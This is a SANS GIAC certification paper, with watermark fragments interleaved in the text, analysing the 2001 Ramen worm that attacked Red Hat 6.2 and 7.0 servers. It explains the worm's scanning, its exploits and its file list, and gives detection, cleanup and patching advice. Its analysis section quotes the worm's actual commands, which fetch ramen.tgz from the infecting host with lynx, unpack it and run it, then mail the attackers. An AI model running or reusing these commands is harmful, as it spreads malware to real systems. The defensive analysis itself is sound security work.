Global Information Assurance Certification Paper - GIAC Certifications
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Global Information Assurance Certification Paper
Copyright SANS Institute
Author Retains Full Rights
This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without express written permission.
Interested in learning more?
Check out the list of upcoming events offering
"Security Essentials Bootcamp Style (Security 401)"
at http://www.giac.org/registration/gsecRamen: Noodles You Don’t Want
Greg Jansky
s.
January 18th started like any other day. I got in to work, had breakfast,
ht
and then started surfing the linux security web sites. At a couple of the sites, I
rig
saw a posting about a linux specific worm called Ramen. After seeing a bunch
of these postings, I figured I had better read one and ensure my systems were
ull
not being compromised without my knowledge. What I read surprised me: a
worm targeting Red Hat servers was slowly spreading across the internet. My
f
systems run Red Hat, 6.0 specifically; I read on.
ins
The Ramen
Key fingerprint worm
= AF19 FA27gets its998D
2F94 nameFDB5
fromDE3D
the index.html
F8B5 06E4files of 4E46
A169 the servers it
eta
has infected. A couple of the notable servers that were infected were: NASA,
Texas A&M University, and SuperMicro, a hardware manufacturer. The worm
rr
appears to exploit servers running Red Hat 6.2 or Red Hat 7.0 by taking
advantage of vulnerable services that have not been upgraded or patched.
ho
Specifically, Red Hat services that are attacked are the rpc services and wuftpd.
ut
For Red Hat 7.0, the scripts take advantage of LPRng. So, while the servers
A
exploited were 6.2 or 7.0, I did not worry, as I was not running the vulnerable
distribution. Other systems not known to be vulnerable (before the worm is
5,
modified:) Red Hat 7.0, for intel – Second Addition, distributions from Red Hat
00
that are previous to 6.2, non-Intel versions of Linux, non-Red Hat versions of
-2
Linux, and any other versions of unix. My interest was sparked, so I found a
copy of the file ramen.tgz to learn more about this worm.
00
A note on two of the tools used in the Ramen package. Synscan is the
20
scanner of choice. Sycscan works by having many separate processes each do
some of the TCP connections. The main process forks off a child, that sends
te
SYNs to all the addresses in a randomly generated address list. The main
tu
process listens for responses. Upon receiving a response, the main process
forks another child process that checks the vulnerabilities. Finally, the main
sti
process sends a packet to www.microsoft.de from port 31337. This is a signal that
In
the child processes have finished all of the scans assigned to them. Source
code for Synscan can be found at http://www.psychoid.lam3rz.de. The second tool
NS
worth a mention is asp, a user supplied service in the worm. This service
SA
receives connections on port 27374 and responds by sending a copy of the
worm to the victim.
Almost every source I read mentioned the same thing: the worm seems
©
to be a package of readily available attack tools put together and controlled by a
script. The first thing the infected machine will do is run the start.sh script. This
script replaces index.html files, removes the /etc/hosts.deny file, differentiates
between the Red Hat 6.2 targets and Red Hat 7.0 targets and copies the
Key fingerprint
appropriate = AF19inFA27
binaries place2F94
for 998D FDB5
synscan DE3D
(the F8B5 06E4
scanner), .w (ftpA169 4E46l (lpd
exploit),
exploit), .s (statd exploit), and randb (class b net ip generator.) Finally, it
appends the appropriate start-up script in /etc/rc.d/rc.sysinit. Scanning
commences.
© SANS Institute 2000 - 2005 Author retains full rights.The attack begins with a scan of the target’s FTP banner. Depending on
what is returned from the banner, IP addresses are written to either a “Red Hat
6.2 exploitable” file or a “Red Hat 7.0 exploitable” file. From there, two scripts
direct attacks against those specific servers.
For Red Hat 6.2 machines, the first attack attempted is an exploit against
s.
wuftpd. Apparently, the wuftpd exploit is not correctly written. Following that, an
ht
attack against nfsd is run. The rpc.statd strings format is used. If this is
rig
successful a portbinding shell code causes a suid rootshell to listen on port
39168, effectively creating a backdoor on the victim machine. Asp then sends
ull
the worm over to the victim machine and email is generated. The following
commands are run:
f
ins
mkdir /usr/src/.poop; cd /usr/src/.poop
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
export TERM=vt100
eta
lynx –source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
rr
gzip –d ramen.tgz; tar –xvf ramen.tar; ./start.sh
echo Eat Your Ramen! | mail –s TOADDR –c gb31337@hotmail.com
ho
gb31337@yahoo.com
A ut
FROMADDR is the address of the infecting machine; the TOADDR is the
infected machine. The Red Hat 7.0 exploit runs the same commands. The
5,
exploit to get into a Red Hat machine exploits a bug in LPRng.
00
The above commands, which are run on the infected machine, do the
-2
following: First, a small http server is installed on port 27374 (a common
windows trojan port.) This is so the worm can spread itself. The worm then
00
identifies the IP address and hostname of the infected machine and closes the
20
holes it used to get in. Lastly, a file that contains RameN Crew, a picture of
Ramen Noodles, and the saying “Hackers looooove noodles” replaces the sites
te
index.html files, including files on remotely mounted file systems.
tu
A list of the files I found in my tgz:
asp file to start the pseudo-webserver
sti
asp62 server for Red Hat 6.2 to serve out the worm on request
In
asp7 Red Hat 7.0 version
bd62.sh setup for worm – Red Hat 6.2
NS
bd7.sh Red Hat 7.0 version
SA
getip.sh get the IP of the infected machine
hackl.sh reads .l file and passes addresses to lh.sh
hackw.sh reads .w file and passes addresses to wh.sh
©
index.html new index.html file with Noodles
l62 LPRng format string exploit
l7 Red Hat 7.0 version
lh.sh script to start l62 or l7
Key fingerprint
randb62 = AF19 FA27
random 2F94 998D
IP generator FDB5bDE3D
– class F8B5 06E4 A169 4E46
subnets
randb7 Red Hat 7.0 version
s62 statdx exploit
s7 Red Hat 7.0 version
© SANS Institute 2000 - 2005 Author retains full rights.scan.sh gets addresses from randb6.2/7 and start synscan
start.sh master start script. See above.
start62.sh start scan (in background), hackl.sh, and hackw.sh
start7.sh Red Hat 7.0 version
synscan62 modified synscan stool – uses .w and .l files
s.
synscan7 Red Hat 7.0 version
ht
w62 venglin wu-ftpd exploit
rig
w7 Red Hat 7.0 version
wh.sh script to driect s and w scripts against a target
ull
wu62 probably a mistake, never called
f
ins
The functionality could have been improved. There are programs not called and
Key fingerprint
an attack = AF19
run that FA27 2F94incorrectly.
is configured 998D FDB5 DE3D F8B5 appears
Also, there 06E4 A169
to 4E46
be no attempt
eta
to hide any of the activities.
rr
As worms go, I wold consider this worm to be relatively harmless; save
for the bandwidth being used to find and attack other machines. A lot of the
ho
worms you read about that infect windows machines carry extremely malicious
Aut
payloads: deleting system files, corrupting system services, and/or
compromising the administrator accounts for malicious purposes. Finally, while
other worms install backdoors to allow for further damage, Ramen not only has
5,
no known backdoor, but also fixes the holes used to get in.
00
Determining if Ramen is on your machine is not that difficult. The easiest
-2
method would be a quick examination of all index.html files. Any file that
includes the Ramen noodle signature is a positive sign of infection. Another
00
major indication of infection by Ramen is the creation of the /usr/src/.poop
20
directory. One method that would take due diligence, a simple check of the ftp
logs show connections that are time stamped eight hours ahead of the actual
te
connection. If you run ‘lsof –I’ and see the asp services listening, you can
tu
assume Ramen is serving itself out. Finally, and unexplainable increase in
sti
bandwidth usage or connections on port 27374 could indicate the presence of
Ramen, and bears more exploration.
In
Cleaning up from a Ramen infection is not that difficult. First and
NS
foremost, patch the vulnerable service that was used to get in. This will prevent
further Ramen break-ins. Next, remove /usr/src/.poop/start*.sh from any start-up
SA
scripts. Remove both the /usr/src/.poop directory and /tmp/ramen.tgz. Change
either xinetd.conf or inetd.conf to not include /sbin/asp. Some versions of
©
Ramen remove the /etc/hosts.deny file; so you may have to restore this file.
Restore any Ramen index.html files with the originals. Finally, reboot the
system to remove any active daemons related to the worm.
If you are running a Red 6.2 or 7.0 server, it will only be a matter of time
before your logs show potential connection attempts that could be Ramen
Key fingerprint
knocking = AF19
on the door.FA27 2F94
There are998D
manyFDB5
waysDE3D F8B5 06E4
to prevent A169all
infection; 4E46
of which
involve being proactive. As with any worm, modification could produce new
entry points into the server, but the following points will help decrease the
chance of infection.
© SANS Institute 2000 - 2005 Author retains full rights.One simple solution would be to change the date of compilation of the ftp
server as broadcast in the FTP banner. The worm currently looks for two dates,
which are signatures for the various versions of ftpd. As the worm gets more
sophisticated, it may use another banner, or signature in the banner.
In my opinion, one of the largest measures that can be taken to protect
s.
your system, either Red Hat 6.2 or 7.0, is to patch the vulnerable services.
ht
Patches for these vulnerabilities have been available from the Red Hat web site
rig
since late 2000. The point should be made that an administrator should take all
the security advisories seriously, and patch the vulnerability. The Ramen worm
ull
highlights the main reason why administrators should patch a newly built server.
Most distributions are notorious for poor installations; be it the servers are
f
ins
unprotected or make use of easily exploitable services.
Key fingerprint
The use=ofAF19
TCPFA27 2F94 998D
Wrappers and FDB5 DE3D
firewalls willF8B5
aid in06E4 A169who
limiting 4E46
uses or
eta
has access to the system. Packet filtering outbound packets on port 27374 will
prevent vulnerable computers from acquiring Ramen. Blocking 27374 inbound
rr
would prevent outside computers from acquiring Ramen from your machines.
Finally, knowing your system is important. Monitoring logs, watching
ho
account activity, and knowing what needs patching and what is patched will aid
Aut
in containing malicious exploits. Increasingly, new administrators will
unintentionally ignore warnings because they do not know what the
ramifications are to their systems.
5,
I saw the Ramen worm as big news for the linux community. You hear a
00
lot of news in the Windows world of new viruses, worms and malware, which
-2
you don’t typically in the linux community. I believe that Raman is wake-up call.
Most sites do not believe the Ramen package was home written, rather it was a
00
hodge podge of already written scripts, packaged together to work as one.
20
Because of this, there is widespread use by “script kiddies” and that widespread
use will lead to modifications. At the time of this writing, there are confirmed
te
sightings of the worm with new web page replacements. Also, as the usage
tu
spreads, exclusive Red Hat attacks will be replaced by attacks on other
sti
distribution’s vulnerabilities. Ultimately, worms with significantly worse payloads
will be developed based on the Ramen architecture.
In
As linux makes its way onto more and more desktops, and proliferates as
NS
a server operating system, we will see more and more linux specific worms.
Keeping abreast of linux vulnerabilities and package/service patches will be the
SA
greatest weapons against these new worms. Finally, distribution manufacturers
can learn from Ramen to create distributions that are more secure out of the
©
box; be it with more secure services or lessening the need to harden the system.
Resources:
Key fingerprint
My copy of the=worm
AF19 FA27 2F94 998D FDB5
was downloaded at: DE3D F8B5 06E4 A169 4E46
htpp://hwa-security.net/hot.html
CERT. “CERT Incident Note IN-2001-01” January 18, 2001. URL:
© SANS Institute 2000 - 2005 Author retains full rights.http://www.cert.org/incident_notes/IN-2001-01.html. (2/12/01)
Dunham, Ken. “Top Ramen – Noodles for script kiddies.” January 19, 2001.
URL: http://securityportal.com/articles/ramen20010119.html (2/15/01).
s.
Lemos, Robert. “Vandals mutate Ramen Linux Worm.” January 23, 2001.
ht
URL: http://www.zdnet.co.uk/news/2001/3/ns-20442.html.
rig
Martin, Daniel. “Ramen Worm.” February 2001. URL:
ull
http://members.home.net/dmartin24/ramen_worm.txt. 2/12/01.
f
ins
Rachard, Kevin. “Ramen and the Dangers of Default Linux Configurations –
Key fingerprint
worming = AF19
into Red HatFA27 2F94
Linux.” 998Dhttp://www.linuxplanet.com/linuxplanet/opinions/2921/1/
URL: FDB5 DE3D F8B5 06E4 A169 4E46
eta
(2/15/01).
rr
Thomas, Benjamin D. “Security is an interactive sport: Lessons learned from
Ramen.” January 29, 2001. URL: http://www.linuxsecurity.com/feature_stories/feature_story-
ho
75.html. (2/15/01).
Vision, Max. “Ramen Internet Worm Analysis.” URL:
A ut
http://www.whitehats.com/print/library/worms/ramen/ (2/17/01).
5,
00
UTC. “Ramen “in-the-wild” – NASA, Texas A&M, SuperMicro Hit.” January 29,
-2
2001. URL: http://linuxpr.com/releases/3230.html. (2/15/01)
00
Ward, Mark. “Linux virus [sic] infection fears.” January 18, 2001. URL:
20
http://news.bbc.co.uk/hi/english/sci/tech/newsid_1123000/1123827.stm. (2/15/01).
te
Zaborav, Dev. “Stopping the Ramen Worm.” February 2001. URL:
tu
http://www.linuxworld.com/linuxworld/lw-2001-02/lw-02-ramenworm.html. (2/15/01).
sti
In
NS
SA
©
Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46
© SANS Institute 2000 - 2005 Author retains full rights.Last Updated: September 22nd, 2018
Upcoming Training
SANS Network Security 2018 Las Vegas, NV Sep 23, 2018 - Sep 30, 2018 Live Event
SANS Denver 2018 Denver, CO Oct 15, 2018 - Oct 20, 2018 Live Event
SANS October Singapore 2018 Singapore, Singapore Oct 15, 2018 - Oct 27, 2018 Live Event
Community SANS Ottawa SEC401 Ottawa, ON Oct 15, 2018 - Oct 20, 2018 Community SANS
SANS Seattle Fall 2018 Seattle, WA Oct 15, 2018 - Oct 20, 2018 Live Event
SANS London October 2018 London, United Oct 15, 2018 - Oct 20, 2018 Live Event
Kingdom
Community SANS Madrid SEC401 (in Spanish) Madrid, Spain Oct 22, 2018 - Oct 27, 2018 Community SANS
SANS Houston 2018 Houston, TX Oct 29, 2018 - Nov 03, 2018 Live Event
Houston 2018 - SEC401: Security Essentials Bootcamp Style Houston, TX Oct 29, 2018 - Nov 03, 2018 vLive
SANS Gulf Region 2018 Dubai, United Arab Nov 03, 2018 - Nov 15, 2018 Live Event
Emirates
SANS Dallas Fall 2018 Dallas, TX Nov 05, 2018 - Nov 10, 2018 Live Event
Community SANS Bethesda SEC401 Bethesda, MD Nov 05, 2018 - Nov 10, 2018 Community SANS
SANS London November 2018 London, United Nov 05, 2018 - Nov 10, 2018 Live Event
Kingdom
SANS Sydney 2018 Sydney, Australia Nov 05, 2018 - Nov 17, 2018 Live Event
San Diego Fall 2018 - SEC401: Security Essentials Bootcamp San Diego, CA Nov 12, 2018 - Nov 17, 2018 vLive
Style
SANS Osaka 2018 Osaka, Japan Nov 12, 2018 - Nov 17, 2018 Live Event
SANS Mumbai 2018 Mumbai, India Nov 12, 2018 - Nov 17, 2018 Live Event
SANS San Diego Fall 2018 San Diego, CA Nov 12, 2018 - Nov 17, 2018 Live Event
Austin 2018 - SEC401: Security Essentials Bootcamp Style Austin, TX Nov 26, 2018 - Dec 01, 2018 vLive
SANS San Francisco Fall 2018 San Francisco, CA Nov 26, 2018 - Dec 01, 2018 Live Event
SANS Austin 2018 Austin, TX Nov 26, 2018 - Dec 01, 2018 Live Event
SANS Nashville 2018 Nashville, TN Dec 03, 2018 - Dec 08, 2018 Live Event
SANS Santa Monica 2018 Santa Monica, CA Dec 03, 2018 - Dec 08, 2018 Live Event
SANS Frankfurt 2018 Frankfurt, Germany Dec 10, 2018 - Dec 15, 2018 Live Event
SANS Cyber Defense Initiative 2018 Washington, DC Dec 11, 2018 - Dec 18, 2018 Live Event
SANS vLive - SEC401: Security Essentials Bootcamp Style SEC401 - 201812, Dec 11, 2018 - Jan 29, 2019 vLive
Community SANS Burbank SEC401 Burbank, CA Jan 07, 2019 - Jan 12, 2019 Community SANS
Community SANS Toronto SEC401 Toronto, ON Jan 14, 2019 - Jan 19, 2019 Community SANS
SANS Sonoma 2019 Santa Rosa, CA Jan 14, 2019 - Jan 19, 2019 Live Event
SANS Amsterdam January 2019 Amsterdam, Netherlands Jan 14, 2019 - Jan 19, 2019 Live Event
SANS Miami 2019 Miami, FL Jan 21, 2019 - Jan 26, 2019 Live EventYou can also read
